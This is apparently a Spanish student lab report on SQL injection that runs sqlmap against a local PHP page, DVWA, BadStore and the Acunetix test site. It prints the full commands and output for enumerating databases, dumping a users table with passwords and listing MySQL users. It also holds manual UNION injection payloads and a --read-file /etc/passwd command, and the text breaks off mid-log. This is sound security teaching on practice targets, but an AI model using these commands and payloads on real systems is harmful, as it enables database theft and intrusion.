SQL

Injection 2

Map

ndice
1. A) Ataque Local..............................................................................................................3 Servidor de BD y Versin ..................................................................................3

B) Nombre de la BD......................................................................................................5 C) D) E) F) G) 2. Tablas: ........................................................................................................................6 Columnas: ................................................................................................................7 Contenido de la Tabla:............................................................................................8 Resto de Bases de Datos: .....................................................................................9 Usuarios de MySQL: ......................................................................................... 10 DVWA ....................................................................................................................... 12

Installation .......................................................................................................................... 12 3. A) BadStore .................................................................................................................. 17 Servidor de BD y Versin ................................................................................ 17

B) Nombre de la BD.................................................................................................... 19 C) D) E) 4. A) Tablas........................................................................................................................ 20 Columnas ............................................................................................................... 21 Resto de BBDD ....................................................................................................... 22 Acunetix.................................................................................................................... 23 Servidor de BD y Versin ................................................................................ 23

B) Nombre de la BD.................................................................................................... 25 C) D) Tablas........................................................................................................................ 26 Columnas ............................................................................................................... 27

Ivn Martn Valderas

Pgina 2

SQL Injection

1. Ataque Local
Vamos a realizar un ataque de SQL injection a nuestra pgina anterior con la cual hacamos una consulta a nuestra base de datos de MySQL. Su localizacin es: http://localhost/ejerPHP/SQL_Injection/consulta.php Para ello utilizaremos el programa SQLMap desde la consola.

A) Servidor de BD y Versin

Primero vamos a averiguar el tipo de servidor de Base de Datos y su versin, para ello utilizaremos la opcin b de sqlmap:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 -b

sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 13:57:25 [13:57:26] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [13:57:26] [INFO] testing connection to the target url [13:57:26] [INFO] testing if the url is stable, wait a few seconds [13:57:27] [INFO] url is stable [13:57:27] [INFO] testing if GET parameter 'id' is dynamic [13:57:27] [INFO] confirming that GET parameter 'id' is dynamic [13:57:27] [INFO] GET parameter 'id' is dynamic [13:57:28] [WARNING] heuristic test shows that GET parameter 'id' might not be i njectable [13:57:28] [INFO] testing sql injection on GET parameter 'id' [13:57:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [13:57:28] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI NG clause' injectable [13:57:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [13:57:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [13:57:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [13:57:28] [INFO] testing 'MySQL > 5.0.11 stacked queries' [13:57:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [13:57:28] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [13:57:38] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in jectable [13:57:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [13:57:38] [INFO] target url appears to be UNION injectable with 3 columns [13:57:38] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 colu mns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] Y sqlmap identified the following injection points with a total of 29 HTTP(s) requests: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1 AND SLEEP(5) --[13:57:44] [INFO] the back-end DBMS is MySQL [13:57:44] [INFO] fetching banner web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 banner: '5.5.8' [13:57:44] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\localhost' [*] shutting down at: 13:57:44

En este paso el programa ha ido testeando cada una de las posibilidades para averiguar el tipo de servidor: []
'MySQL > 5.0.11 'PostgreSQL > 8.1 'Microsoft SQL Server

[]

Tras realizar las operaciones, encontramos la versin: MySQL 5.0.11

Ivn Martn Valderas

Pgina 4

SQL Injection

B) Nombre de la BD

ste es el primer paso para sacar toda la informacin que podamos de nuestra vctima ya que a partir de aqu iremos pasa a paso entrando ms a fondo en la BD. Sacamos el nombre de la Base de Datos a la que se refiere la consulta que hemos realizado, es decir la base de datos actual, con el comando: --current-db

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 --current-db

sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:01:02 [14:01:02] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:01:02] [INFO] resuming injection data from session file [14:01:02] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:01:02] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:01:03] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:01:03] [INFO] fetching current database

current database: 'asir1'

[14:01:03] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\localhost' [*] shutting down at: 14:01:03

El nombre de la Base de Datos es asir1

C) Tablas: Una vez obtenido el nombre de la Base de Datos, ya podemos proceder a ver las tablas que sta posee, mediante el comando --tables indicando D asir1 para el nombre que hemos obtenido antes:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 --tables -D asir1

sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:04:48 [14:04:48] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:04:48] [INFO] resuming injection data from session file [14:04:48] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:04:48] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:04:49] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:04:49] [INFO] fetching tables for database 'asir1' [14:04:49] [INFO] the SQL query used returns 1 entries

Database: asir1 [1 table] +----------+ | usuarios | +----------+

[14:04:49] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\localhost' [*] shutting down at: 14:04:49

Obtenemos una tabla: usuarios

Ivn Martn Valderas

Pgina 6

SQL Injection

D) Columnas:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 --columns -T usuarios -D asir1

sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:06:30 [14:06:30] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:06:30] [INFO] resuming injection data from session file [14:06:30] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:06:30] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:06:31] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:06:31] [INFO] fetching columns for table 'usuarios' on database 'asir1' [14:06:31] [INFO] the SQL query used returns 3 entries

Database: asir1 Table: usuarios [3 columns] +--------------+-------------------------+ | Column | Type | +--------------+-------------------------+ | id | int(10) unsigned | | nonmbre | varchar(50) | | password | varchar(50) | +----------+-----------------------------+
[14:06:31] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\localhost' [*] shutting down at: 14:06:31

Hemos obtenido los nombres de las columnas y su tipo

E) Contenido de la Tabla:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 --dump -T usuarios -D asir1

sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:07:28 [14:07:28] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:07:28] [INFO] resuming injection data from session file [14:07:28] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:07:28] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:07:28] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:07:29] [INFO] fetching columns for table 'usuarios' on database 'asir1' [14:07:29] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\localhost\session' : id, int(10) unsigned, nonmbre, varchar(50), password, varchar(50) [14:07:29] [INFO] fetching entries for table 'usuarios' on database 'asir1' [14:07:29] [INFO] the SQL query used returns 3 entries

Database: asir1 Table: usuarios [3 entries] +----+---------+----------+ | id | nonmbre | password | +----+---------+----------+ | 2 | ivan | ivanasir | | 3 | luci | luciasir | | 1 | root | asir2012 | +----+---------+----------+ Ahora ya tenemos nuestra tabla usuarios de la Base de Datos asir1 completa
Ivn Martn Valderas Pgina 8

SQL Injection

F) Resto de Bases de Datos:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 --dbs

sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:08:22 [14:08:22] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:08:22] [INFO] resuming injection data from session file [14:08:22] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:08:22] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:08:22] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:08:22] [INFO] fetching database names [14:08:22] [INFO] the SQL query used returns 8 entries

available databases [8]: [*] asir1 [*] cdcol [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test [*] webauth

G) Usuarios de MySQL:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 --users

sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:10:03 [14:10:03] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:10:03] [INFO] resuming injection data from session file [14:10:03] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:10:03] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:10:03] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:10:03] [INFO] fetching database users [14:10:03] [INFO] the SQL query used returns 58 entries

database management system users [4]: [*] ''@'localhost' [*] 'pma'@'localhost' [*] 'root'@'127.0.0.1' [*] 'root'@'localhost'

Ivn Martn Valderas

Pgina 10

SQL Injection

Slo existe un usuario root. Aqu est uno de los problemas. Estamos utilizando el usuario root que trae por defecto MySQL para acceder por PHP. Si estamos utilizando el usuario root para nuestras sentencias de SQL eso quiere decir que podemos hacer llamadas al sistema:

As podramos saber las contraseas usadas, por ejemplo en UNIX:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 --read-file /etc/passwd

2. DVWA

Damn Vulnerable Web App [[La carpeta debe estar en htdocs]]

Installation
Default username = admin Default password = password

Para accede, debemos escribir en nuestro explorador: http://127.0.0.1/dvwa/

Creamos la Base de Datos

Ivn Martn Valderas

Pgina 12

SQL Injection

Comprobamos la existencia de la vulnerabilidad:

1' or '1'='1' union select password, first_name from users where first_name='admin

ID: 1' or '1'='1' union select password, first_name from users where first_name='admin
First name: 5f4dcc3b5aa765d61d8327deb882cf99 Surname: admin

http://es.scribd.com/doc/48652427/Practica-SQL-Injection-en-DVWA

Ivn Martn Valderas

Pgina 14

SQL Injection

Hemos obtenido una contrasea, aunque como vemos est codificada, vamos a utilizar una utilidad web para decodificarla:

Probamos a sacar todas las contraseas a la vez, ya que con el anterior cdigo deberamos hacerlo 1 a 1:

1' or '1'='1' union select first_name, password from users where '1'='1

Ivn Martn Valderas

Pgina 16

SQL Injection

3. BadStore

Si en el campo search escribimos una comilla doble () nos encontramos con una respuesta del servidor SQL, por lo que podemos prever la vulneravilidad SQL

Al igual que con la primera prctica, vamos a seguir los pasos

A) Servidor de BD y Versin

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?se archquery=hi&action=search&x=0&y=0" -b

sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:02:41 [10:02:41] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:02:41] [INFO] testing connection to the target url [10:02:41] [INFO] testing if the url is stable, wait a few seconds [10:02:42] [INFO] url is stable [10:02:42] [INFO] testing if GET parameter 'searchquery' is dynamic [10:02:43] [WARNING] GET parameter 'searchquery' is not dynamic [10:02:43] [INFO] heuristic test shows that GET parameter 'searchquery' might be injectable (possible DBMS: MySQL) [10:02:43] [INFO] testing sql injection on GET parameter 'searchquery' [10:02:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[10:02:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:02:45] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:02:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' parsed error message(s) showed that the back-end DBMS could be MySQL. Do you wan t to skip test payloads specific for other DBMSes? [Y/n] y [10:02:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:02:57] [INFO] target url appears to be UNION injectable with 4 columns [10:02:57] [INFO] GET parameter 'searchquery' is 'MySQL UNION query (NULL) - 1 t o 10 columns' injectable

GET parameter 'searchquery' is vulnerable. Do you want to keep testing the other s? [y/N] y Aqu nos ha avisado de que el parmetro searchquery es vulnerable, es decir, la caja de bsqueda donde antes insertamos las comillas dobles () posee un GET que nos permitir insertar ah sentencias SQL, nos pregunta adems si queremos buscar otros parmetros vulnerables.
[10:03:05] [INFO] testing if GET parameter 'action' is dynamic [10:03:05] [INFO] confirming that GET parameter 'action' is dynamic [10:03:05] [INFO] GET parameter 'action' is dynamic [10:03:05] [WARNING] heuristic test shows that GET parameter 'action' might not be injectable [10:03:05] [INFO] testing sql injection on GET parameter 'action' [10:03:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:03:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:03:07] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:03:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:03:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:03:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [10:03:17] [WARNING] GET parameter 'action' is not injectable [10:03:17] [INFO] testing if GET parameter 'x' is dynamic [10:03:17] [WARNING] GET parameter 'x' is not dynamic [10:03:17] [WARNING] heuristic test shows that GET parameter 'x' might not be in jectable [10:03:17] [INFO] testing sql injection on GET parameter 'x' [10:03:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:03:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:03:19] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:03:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:03:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:03:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [10:03:31] [WARNING] GET parameter 'x' is not injectable [10:03:31] [INFO] testing if GET parameter 'y' is dynamic [10:03:31] [WARNING] GET parameter 'y' is not dynamic [10:03:31] [WARNING] heuristic test shows that GET parameter 'y' might not be in jectable [10:03:31] [INFO] testing sql injection on GET parameter 'y' [10:03:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:03:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:03:33] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:03:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:03:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:03:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [10:03:44] [WARNING] GET parameter 'y' is not injectable sqlmap identified the following injection points with a total of 380 HTTP(s) req uests: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0

Ivn Martn Valderas

Pgina 18

SQL Injection
--[10:03:45] [INFO] testing MySQL [10:03:45] [INFO] confirming MySQL [10:03:45] [INFO] the back-end DBMS is MySQL [10:03:45] [INFO] fetching banner web application technology: Apache 1.3.28

back-end DBMS: MySQL < 5.0.0

banner: '4.1.7-standard' [10:03:45] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164' [*] shutting down at: 10:03:45

B) Nombre de la BD C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?se archquery=hi&action=search&x=0&y=0" --current-db

sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:12:35 [10:12:35] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:12:35] [INFO] resuming injection data from session file [10:12:35] [INFO] resuming back-end DBMS 'mysql 4' from session file [10:12:35] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0 --[10:12:35] [INFO] the back-end DBMS is MySQL web application technology: Apache 1.3.28 back-end DBMS: MySQL 4 [10:12:35] [INFO] fetching current database

current database: 'badstoredb'

[10:12:36] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164' [*] shutting down at: 10:12:36

El nombre de la BD es badstoredb

C) Tablas
C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?se archquery=hi&action=search&x=0&y=0" --tables -D badstoredb
sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:20:13 [10:20:13] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:20:13] [INFO] resuming injection data from session file [10:20:13] [INFO] resuming back-end DBMS 'mysql 4' from session file [10:20:13] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0 --[10:20:14] [INFO] the back-end DBMS is MySQL web application technology: Apache 1.3.28 back-end DBMS: MySQL 4 [10:20:14] [ERROR] information_schema not available, back-end DBMS is MySQL < 5. 0 do you want to use common table existance check? [Y/n/q] y [10:20:21] [INFO] checking table existence using items from 'C:\sqlmap-0.9\sqlma p\txt\common-tables.txt' [10:20:21] [INFO] adding words used on web page to the check list please enter number of threads? [Enter for 1 (current)] [10:20:28] [WARNING] running in a single-thread mode. This could take a while. [10:27:14] [INFO] retrieved: itemdb

Database: badstoredb [1 table] +--------+ | itemdb | +--------+

[10:27:14] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164' [*] shutting down at: 10:27:14

El nombre de la tabla es itemdb

Ivn Martn Valderas

Pgina 20

SQL Injection

D) Columnas C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?se archquery=hi&action=search&x=0&y=0" --columns -T itemdb -D badstoredb

sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:29:00 [10:29:00] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:29:00] [INFO] resuming injection data from session file [10:29:00] [INFO] resuming back-end DBMS 'mysql 4' from session file [10:29:00] [INFO] resuming brute forced table name 'itemdb' from session file [10:29:00] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0 --[10:29:00] [INFO] the back-end DBMS is MySQL web application technology: Apache 1.3.28 back-end DBMS: MySQL 4 [10:29:00] [ERROR] information_schema not available, back-end DBMS is MySQL < 5. 0 do you want to use common columns existance check? [Y/n/q] y [10:29:03] [INFO] checking column existence using items from 'C:\sqlmap-0.9\sqlm ap\txt\common-columns.txt' please enter number of threads? [Enter for 1 (current)] [10:29:05] [WARNING] running in a single-thread mode. This could take a while. [10:29:36] [INFO] retrieved: price [10:29:55] [INFO] retrieved: qty

Database: badstoredb Table: itemdb [2 columns] +--------+---------+ | Column | Type | +--------+---------+ | price | numeric | | qty | numeric | +--------+---------+
[10:34:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164'

[*] shutting down at: 10:34:18

E) Resto de BBDD
Como podemos haber visto, no hay ninguna tabla llamada usuarios ni nada por el estilo, slo se encuentra la tabla de los productos por lo que de esta manera no podemos sacar ni usuarios ni contraseas, vamos a comprobar entonces otras bases de datos:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?se archquery=hi&action=search&x=0&y=0" --dbs

sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:36:17 [10:36:17] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:36:17] [INFO] resuming injection data from session file [10:36:17] [INFO] resuming back-end DBMS 'mysql 4' from session file [10:36:17] [INFO] resuming brute forced table name 'itemdb' from session file [10:36:17] [INFO] resuming brute forced column name 'price' for table 'itemdb' f rom session file [10:36:17] [INFO] resuming brute forced column name 'qty' for table 'itemdb' fro m session file [10:36:17] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0 --[10:36:18] [INFO] the back-end DBMS is MySQL web application technology: Apache 1.3.28 back-end DBMS: MySQL 4 [10:36:18] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database [10:36:18] [INFO] fetching database names [10:36:18] [INFO] fetching number of databases [10:36:18] [ERROR] unable to retrieve the number of databases [10:36:18] [INFO] falling back to current database [10:36:18] [INFO] fetching current database [10:36:18] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\ses

sion': badstoredb available databases [1]: [*] badstoredb

[10:36:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164' [*] shutting down at: 10:36:18

Ivn Martn Valderas

Pgina 22

SQL Injection

4. Acunetix

Entramos en la web y si damos unas vueltas por ella , en el apartado categories vemos que la url nos aparece ?cat=1, es un indicio para comprobar. http://testphp.vulnweb.com/listproducts.php?cat=1

Vamos a sqlmap y probamos con: A) Servidor de BD y Versin C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:52:48 [10:52:49] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [10:52:49] [INFO] testing connection to the target url [10:52:49] [INFO] testing if the url is stable, wait a few seconds [10:52:50] [INFO] url is stable [10:52:50] [INFO] testing if GET parameter 'cat' is dynamic [10:52:50] [INFO] confirming that GET parameter 'cat' is dynamic [10:52:51] [INFO] GET parameter 'cat' is dynamic [10:52:51] [INFO] heuristic test shows that GET parameter 'cat' might be injecta

